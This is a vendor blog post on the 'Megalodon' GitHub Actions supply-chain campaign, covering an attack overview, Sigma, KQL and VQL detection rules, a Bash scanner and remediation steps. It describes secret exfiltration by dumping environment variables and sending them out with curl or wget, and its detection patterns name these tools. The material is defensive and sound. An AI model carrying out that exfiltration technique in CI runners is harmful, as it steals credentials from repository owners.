Back to Intelligence

Megalodon GitHub Actions Attack: Detection and Remediation Guide

SA
Security Arsenal Team
May 25, 2026
5 min read

Introduction

The integrity of the software supply chain is under siege. SecurityWeek has reported a massive campaign, dubbed 'Megalodon,' resulting in the infection of over 5,500 GitHub repositories. Attackers are actively pushing fake automated commits that inject malicious GitHub Actions workflows. These workflows are designed specifically to siphon off CI/CD secrets, API keys, and tokens. This is not a theoretical risk; it is an active, widespread exploitation of the trust we place in automation. If your organization utilizes GitHub Actions, your credentials are currently at risk of exfiltration. Immediate action is required to identify malicious workflows and rotate compromised secrets.

Technical Analysis

  • Affected Products/Platforms: GitHub (Cloud and Enterprise Server) repositories utilizing GitHub Actions.
  • CVE Identifiers: N/A (This is an abuse of legitimate functionality and identity spoofing, not a software vulnerability).
  • Attack Vector: The attack begins with a malicious push event. Attackers impersonate legitimate automated bots (e.g., Dependabot) or submit seemingly routine pull requests. These commits introduce or modify YAML files within the .github/workflows/ directory.
  • Mechanism of Action: The injected YAML file contains a workflow definition that executes shell commands (bash or sh) within the GitHub runner environment. The script typically enumerates environment variables (where secrets are injected) and uses curl or wget to exfiltrate this data to an attacker-controlled command-and-control (C2) server.
  • Exploitation Status: Confirmed Active. Thousands of repositories are currently hosting these malicious workflows, indicating a successful, automated supply chain compromise.

Detection & Response

SIGMA Rules

The following Sigma rules target the execution behavior within the GitHub runner environment (Linux) to detect common exfiltration techniques used in this campaign.

YAML
---
title: Potential GitHub Actions Exfiltration via Curl
id: 9c5e2f1a-3b4d-4e8f-9a0b-1c2d3e4f5a6b
status: experimental
description: Detects GitHub Actions runner executing curl or wget to external IPs, a common behavior in repository supply chain attacks like Megalodon to exfiltrate secrets.
references:
  - https://www.securityweek.com/over-5500-github-repositories-infected-in-megalodon-supply-chain-attack/
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.execution
  - attack.t1059.004
  - attack.exfiltration
  - attack.t1041
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    Image|endswith:
      - '/curl'
      - '/wget'
    ParentImage|contains:
      - 'runner'
      - 'actions'
  filter_github:
    DestinationHostname|endswith:
      - 'githubusercontent.com'
      - 'github.com'
      - 'pkg.github.com'
  condition: selection and not filter_github
falsepositives:
  - Legitimate package downloads in CI pipelines
level: high
---
title: Suspicious Environment Variable Dumping in CI Runner
id: a1b2c3d4-e5f6-4a5b-8c9d-0e1f2a3b4c5d
status: experimental
description: Detects execution of 'printenv' or 'env' commands within a GitHub Runner context, often used to dump secrets before exfiltration in supply chain attacks.
references:
  - https://www.securityweek.com/over-5500-github-repositories-infected-in-megalodon-supply-chain-attack/
author: Security Arsenal
date: 2026/04/06
tags:
  - attack.credential_access
  - attack.t1003
logsource:
  category: process_creation
  product: linux
detection:
  selection:
    Image|endswith:
      - '/printenv'
      - '/env'
    ParentImage|contains:
      - 'runner'
      - 'actions'
  condition: selection
falsepositives:
  - Developers debugging environment issues in CI
level: medium

KQL (Microsoft Sentinel / Defender)

This hunt query targets GitHub Audit Logs to identify the initial infection vector: modifications to workflow files by users or suspicious actors.

KQL — Microsoft Sentinel / Defender
// Hunt for modifications to .github/workflows indicating potential injection
GitHubAuditLog
| where OperationName in ('push', 'create')
| extend RepoName = tostring(properties.repository.name)
| extend Actor = tostring(properties.actor)
| extend PushedRef = tostring(properties.ref)
| extend Files = todynamic(properties.pushes)[0].commits[0].added // Parsing added files, adjust based on specific schema schema version
| mv-expand Files
| where Files contains ".github/workflows"
| project TimeGenerated, Actor, OperationName, RepoName, PushedRef, Files
| order by TimeGenerated desc

Velociraptor VQL

Use this artifact to hunt for suspicious YAML files containing exfiltration keywords within cloned repositories on developer endpoints or build servers.

VQL — Velociraptor
-- Hunt for suspicious keywords in GitHub Actions workflow files
SELECT FullPath, Mtime, Size,
       read_file(filename=FullPath, length=1024) AS HeaderContent
FROM glob(globs='/.github/workflows/*.yml')
WHERE HeaderContent =~ 'curl.*http'
   OR HeaderContent =~ 'wget.*http'
   OR HeaderContent =~ 'base64'
   OR HeaderContent =~ 'printenv'

Remediation Script

This Bash script scans a given directory for git repositories and checks for unauthorized modifications to workflow files containing suspicious keywords.

Bash / Shell
#!/bin/bash

# Scan for potential Megalodon indicators in local git repos
SCAN_DIR="${1:-.}"

echo "[+] Scanning $SCAN_DIR for compromised GitHub Actions workflows..."

find "$SCAN_DIR" -name ".git" -type d | while read -r git_dir; do
    repo_dir=$(dirname "$git_dir")
    workflow_dir="$repo_dir/.github/workflows"

    if [ -d "$workflow_dir" ]; then
        echo "[!] Checking workflows in: $repo_dir"
        grep -r -l -E "(curl|wget).*http|printenv|base64" "$workflow_dir"/*.yml 2>/dev/null | while read -r file; do
            echo "    [WARNING] Potential exfil keyword found in: $file"
        done
    fi
done

echo "[+] Scan complete. Manually review any warnings."

Remediation

  1. Immediate Secret Rotation: Assume all repository secrets (GH_TOKEN, AWS keys, DB passwords) exposed in the last 6 months are compromised. Rotate them immediately.
  2. Audit Workflow Files: Manually inspect every YAML file in .github/workflows/ across all repositories. Look for:
    • Unknown or recently modified files.
    • Steps executing curl, wget, or bash with encoded strings.
    • References to external URLs not associated with your organization.
  3. Review Commit History: Identify "fake automated" commits. Look for commits attributed to users you do not recognize or bots that do not exist in your organization.
  4. Implement Branch Protection: Enforce rules requiring Pull Request reviews before any changes can be merged to the main branch. Specifically, restrict who can push to .github/workflows/.
  5. Official Advisory: Review the GitHub Security Advisory for updated IOCs and specific recommendations regarding this campaign.

Related Resources

Security Arsenal Healthcare Cybersecurity AlertMonitor Platform Book a SOC Assessment healthcare Intel Hub

healthcare-cybersecurityhipaa-compliancehealthcare-ransomwareehr-securitymedical-data-breachgithub-actionssupply-chainmegalodon

Is your security operations ready?

Get a free SOC assessment or see how AlertMonitor cuts through alert noise with automated triage.

Book a SOC AssessmentSee AlertMonitor in Action